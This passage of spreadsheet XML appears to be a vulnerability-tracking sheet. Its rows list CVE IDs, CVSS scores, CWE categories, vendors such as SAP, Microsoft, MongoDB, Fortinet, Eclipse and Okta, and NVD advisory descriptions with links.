      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="S395" s="5" t="inlineStr">
        <is>
          <t>SAP Web Dispatcher, Internet Communication Manager and SAP Content Server allows an authenticated low-privileged attacker to access certain administrative functionality or interface and obtain sensitive information about the system state, resulting in information disclosure. This disclosed information could potentially be used to facilitate further attacks. This vulnerability has a high impact on the confidentiality of the application, with no impact on integrity or availability.</t>
        </is>
      </c>
      <c r="T395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76968</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76971</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S396" s="5" t="inlineStr">
        <is>
          <t>Due to a Server-Side Request Forgery (SSRF) vulnerability in SAP Manufacturing Integration and Intelligence, an attacker could cause the server to initiate arbitrary outbound requests. If processed by the application, this behavior could be combined with XML/XSL processing to enable execution of scripts. Successful exploitation could result in a low impact on the confidentiality, integrity, and availability of the application.</t>
        </is>
      </c>
      <c r="T396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76971</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78453</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K39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397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S397" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78453</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82059</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K398" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S398" s="5" t="inlineStr">
        <is>
          <t>An internal aggregation expression in MongoDB Server was incorrectly registered as accessible to any authenticated user rather than being restricted to internal cluster operations. By crafting a malformed index specification within this expression, an authenticated user with read-only privileges could trigger an assertion failure in the index key generation code path. In certain build configurations, this assertion failure results in termination of the mongod process, causing a denial of service to all connected clients.</t>
        </is>
      </c>
      <c r="T398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82059</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82069</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K399" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="S399" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server's query statistics serialization on the router allows users with monitoring privileges to access unredacted search query text from other users' operations. An improper conditional check in the serialization logic causes the data redaction mechanism to be bypassed when processing search queries through the sharded cluster router. This results in sensitive query literals being stored and made accessible through the query statistics interface.</t>
        </is>
      </c>
      <c r="T399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82069</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84391</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>CWE-457</t>
        </is>
      </c>
      <c r="S400" s="5" t="inlineStr">
        <is>
          <t>A use of uninitialized variable vulnerability in Fortinet FortiAnalyzer 7.6.3 through 7.6.6 may allow attacker to denial of service via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="T400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84391</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69874</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K401"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01" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S401" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69874</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69878</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K402" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S402" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69878</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71338</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K403" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S403" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Failover Cluster allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71338</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77887</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K404" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S404" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77887</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77891</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K405" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S405" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77891</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86590</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S406" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Che versions 7.79.0 through 7.121.0, the dashboard backend's POST /dashboard/api/data/resolver endpoint passes a caller-supplied URL directly to an outbound HTTP GET request with no host filtering. An authenticated user can exploit this server-side request forgery (SSRF) to read responses from internal network addresses, including the cloud instance metadata service (169.254.169.254), loopback interfaces, RFC-1918 private ranges, and in-cluster Kubernetes services. The operator-configured allowlist (spec.devEnvironments.allowedSources.urls) is not consulted. The vulnerability is fixed in version 7.122.0, which adds private-address blocking, IPv4-mapped IPv6 bypass prevention, operator allowlist enforcement, and disables HTTP redirects on the outbound request.</t>
        </is>
      </c>
      <c r="T406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86590</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78552</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr">
        <is>
          <t>nginx, okta</t>
        </is>
      </c>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S407" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not apply its Lua directive restriction to the application-level custom configuration field. The field is interpolated directly into the nginx server block without inspection, resulting in execution of injected directives.</t>
        </is>
      </c>
      <c r="T407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78552</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78622</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S408" s="5" t="inlineStr">
        <is>
          <t>The Okta Verify for Windows uninstaller does not verify whether the user data directory is a filesystem junction before deleting its contents with elevated privileges. The delete operation follows the junction target, resulting in recursive deletion of unintended directory contents.</t>
        </is>
      </c>
      <c r="T408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78622</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82056</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K409" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S409" s="5" t="inlineStr">
        <is>
          <t>A race condition in MongoDB server's text index query parsing can cause a heap use-after-free read when handling upsert retry paths. Under certain concurrent index lifecycle operations, a raw pointer to internal text index metadata may be dereferenced after the underlying structures have been freed, leading to a server crash. An authenticated user with readWrite privileges can trigger this condition through specific concurrent text-search and index management operations, resulting in denial of service for all connected clients. This</t>
        </is>
      </c>
      <c r="T409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82056</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82063</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K410" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S410" s="5" t="inlineStr">
        <is>
